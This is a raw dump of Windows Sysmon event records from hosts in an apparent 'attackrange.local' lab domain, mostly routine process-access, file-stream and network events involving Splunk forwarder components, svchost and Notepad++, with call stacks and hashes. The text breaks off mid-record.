10341000x8000000000000000806726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F390-60EB-5679-00000000D001}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.065{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F390-60EB-5679-00000000D001}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.066{0C1E0330-F390-60EB-5679-00000000D001}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:29.690{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1164DBB22CE20BCA636F9462FFD04D1F,SHA256=64FD577680A03B24774C17E3D6A85BEDB407D85EFF218FF9772847E926B80FDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:29.933{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=70940ACC8AF473C36CCE561AB6B8222C,SHA256=B8BFE97824AD60A72BCC1579FB194FE67E572ED2D8A12B09B3A44DFA0418B5C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.802{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50954-false10.0.1.12-8000- 23542300x80000000000000001046989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:29.002{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668121370F370E8537F8AB6D446AB467,SHA256=CCE792C42149D6EFB12492AF963E8A3A23D74BBB6242D74C34C26DC3B952E0ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:29.159{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26412297ABD323C8E5A5EF0C9E0A467F,SHA256=26AEFDC4F88C87DC218FECD61C37E022D901DD0F5BFC81AB4452FE527BCD4DDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:30.706{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83A260EEDEA1D20E30016C2729C0FBB2,SHA256=A8B41A7A6F5F2F22A754969569C86E0096BEF2F672FD20921CC2D85FD4601438,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd